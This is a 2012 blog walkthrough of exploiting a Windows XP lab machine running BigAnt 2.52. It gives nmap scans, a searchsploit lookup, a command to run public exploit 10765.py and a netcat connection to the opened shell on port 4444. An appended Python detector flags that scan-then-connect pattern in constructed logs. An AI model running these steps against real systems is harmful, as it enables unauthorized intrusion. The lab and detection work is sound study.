=======================================================

Monday, September 10, 2012

Exploiting Windows XP Using exploitdb [ BigAnt ]

This is a trial of "exploit Windows XP" in VirtualBox with BackTrack. I use exploitdb as a database of vulnerabilities that have already been exploited. To search the exploitdb list, use the command:

    ./searchsploit <name of application> <OS> <remote/local>


Now it is time to try "How to exploit Windows XP", with the following steps:

1. Information Gathering
     Scan for live hosts with nmap:

         # nmap <network id/netmask>
         # nmap 192.168.56.0/24


2. Service Enumeration
     To find out which services are running on the system, we can look at the open ports. I use nmap to find the open ports:

         # nmap -p <port range> <ip address>
         # nmap -p 1-65535 192.168.56.101

     Ports 6660/tcp and 6661/tcp are open, but I don't know what application is running on the system. As an assumption, I know he uses the BigAnt application, version 2.52.

3. Vulnerability Assessment
     Search for any possible BigAnt vulnerability with searchsploit in exploitdb:

         # ./searchsploit bigant windows remote

4. Exploit
     To see how to use it, open the file 10765.py (with the cat command or another tool) and then execute it:

         # python 10765.py 192.168.56.101
         # nc -vn 192.168.56.101 4444
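
Seen from the defender's side, steps 2 and 4 leave a recognizable pattern in connection logs: one source touching many ports on one host, then connecting to TCP 4444 once the scan has gone quiet. The following Python example is an addition to this post, not the author's code; the log format, the thresholds, and the source addresses 192.168.56.102 and 192.168.56.20 are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

SWEEP_PORTS = 100                     # distinct ports on one host that count as a sweep (assumed)
SWEEP_WINDOW = timedelta(minutes=5)   # time span in which those ports must be seen (assumed)
QUIET_GAP = timedelta(seconds=30)     # pause separating the sweep from a later connection (assumed)
WATCH_PORT = 4444                     # port the walkthrough connects to with nc

def parse(line):
    # Constructed record format: "<ISO time> <src> <dst> <dst_port>"
    ts, src, dst, port = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port)

def detect(lines):
    """Return alert tuples for port sweeps and for a later connection to WATCH_PORT."""
    recent = defaultdict(list)   # (src, dst) -> [(time, port)] still inside SWEEP_WINDOW
    swept, last_seen, alerts = set(), {}, []
    for ts, src, dst, port in sorted(parse(l) for l in lines if l.strip()):
        key = (src, dst)
        if key in swept:
            # Probes that belong to the sweep itself arrive back to back; only a
            # connection after a quiet gap is treated as the follow-up.
            if port == WATCH_PORT and ts - last_seen[key] >= QUIET_GAP:
                alerts.append(("connect_after_sweep", src, dst, port))
        else:
            recent[key] = [(t, p) for t, p in recent[key] if ts - t <= SWEEP_WINDOW]
            recent[key].append((ts, port))
            ports = {p for _, p in recent[key]}
            if len(ports) >= SWEEP_PORTS:
                swept.add(key)
                alerts.append(("port_sweep", src, dst, len(ports)))
        last_seen[key] = ts
    return alerts

def sample_log():
    """Constructed records: a sweep of ports 4300-4599, a later 4444 connection, a normal client."""
    t0, target = datetime(2012, 9, 10, 12, 0, 0), "192.168.56.101"
    rows = [(t0 + timedelta(milliseconds=10 * i), "192.168.56.102", target, 4300 + i)
            for i in range(300)]
    rows.append((t0 + timedelta(minutes=2), "192.168.56.102", target, WATCH_PORT))
    rows += [(t0 + timedelta(seconds=s), "192.168.56.20", target, p)
             for s, p in ((1, 6660), (2, 6661), (90, 6660))]
    return [f"{t.isoformat()} {s} {d} {p}" for t, s, d, p in rows]

if __name__ == "__main__":
    for alert in detect(sample_log()):
        print(alert)
```

The probe of port 4444 that is part of the sweep does not raise the second alert; only the connection two minutes later does, and the client that talks only to 6660 and 6661 raises nothing.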